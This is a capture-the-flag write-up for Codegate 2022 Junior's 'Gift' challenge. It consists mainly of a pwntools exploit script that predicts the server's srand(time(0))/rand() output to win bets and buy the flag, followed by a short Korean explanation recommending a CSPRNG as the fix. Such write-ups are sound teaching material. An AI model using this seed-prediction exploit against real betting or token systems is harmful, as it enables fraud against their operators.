[CTF write up] Codegate CTF 2022 Junior - Gift : Rand() Crack

2022. 2. 27. 17:38CTF write up

from pwn import *
import ctypes

# Amount sent with the first bet; the script updates it locally after every
# round. Presumably this mirrors the starting in-game balance -- confirm
# against the challenge binary.
point = 20

def money(point):
    """Play one round through menu 3 -> 5, betting `point` on the predicted side.

    A local libc is seeded with the current time and its first two rand()
    outputs (mod 50) are compared to choose side 2 or side 1.  Per the
    write-up, this matches the server because it seeds its generator at the
    same moment; time() has one-second resolution, so both sides get the
    same seed within that second.

    Defensive takeaway: rand() seeded from wall-clock time is predictable to
    any client with a roughly synchronized clock.  Outcomes that carry value
    should come from a CSPRNG (e.g. getrandom(2) or /dev/urandom), not from
    srand(time)/rand().

    Args:
        point: amount to send with the bet.

    Relies on the module-level tube `p`.
    """
    # Walk the two menu levels that lead to the betting prompt.
    for menu_choice in (b'3', b'5'):
        p.sendlineafter(b'>', menu_choice)

    # Seed immediately after entering the round so the local clock reading is
    # as close as possible to the one the server takes.
    libc = ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
    libc.srand(libc.time(0))
    first = libc.rand() % 50
    second = libc.rand() % 50

    # NOTE(review): the meaning of sides 1 and 2 is not shown on the page; the
    # script only shows that 2 is sent when the first value is larger.
    bet = f'{point} 2' if first > second else f'{point} 1'
    p.sendlineafter(b'>', bet.encode())
    print(first, second)

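# Target selection.  The original spawned the local binary and then rebound
# `p` to the remote socket on the next line, leaving an unused child process
# that was never closed.  Only one tube is opened now: pass LOCAL on the
# command line (pwntools magic argument) to run against the local binary.
#p = process(['cooldown'], env={'LD_PRELOAD':'./libc.so.6'})
if args.LOCAL:
    p = process('Gift')
else:
    p = remote('3.39.28.41', 8888)

# Answer the initial '?' prompt with a placeholder name.
p.sendlineafter(b'?', b'name')

# Menu 3 -> 3, then a free-form value.
# NOTE(review): what this step configures is not shown on the page.
p.sendlineafter(b'>', b'3')
p.sendlineafter(b'>', b'3')
p.sendlineafter(b'>', b'abcd')

# Five predicted rounds.  The local bookkeeping assumes every round is won
# and triples the tracked amount; nothing here verifies the server's reply.
for _ in range(5):
    money(point)
    point *= 3

# Twenty passes through menu 3 -> 4 -> 2, each tracked locally as costing 100.
# NOTE(review): what is being bought is not shown on the page.
for _ in range(20):
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b'>', b'4')
    p.sendlineafter(b'>', b'2')
    point -= 100

print(point)

# Ten more predicted rounds with the same tripling assumption.
for _ in range(10):
    money(point)
    point *= 3

# Hand the session over to the operator.
p.interactive()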

 

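서버가 난수 시드를 설정하는 시점과 같은 시각에 로컬에서도 srand(time(0))으로 시드를 설정하면, rand() 함수가 서버와 동일한 값을 반환한다. 해당 트릭으로 결과를 미리 알고 포인트를 늘려서 flag를 구매하면 된다. 즉 취약점의 원인은 현재 시각처럼 추측 가능한 값을 시드로 사용한 데 있으며, 이런 결과값은 getrandom() 같은 CSPRNG로 생성해야 예측을 막을 수 있다.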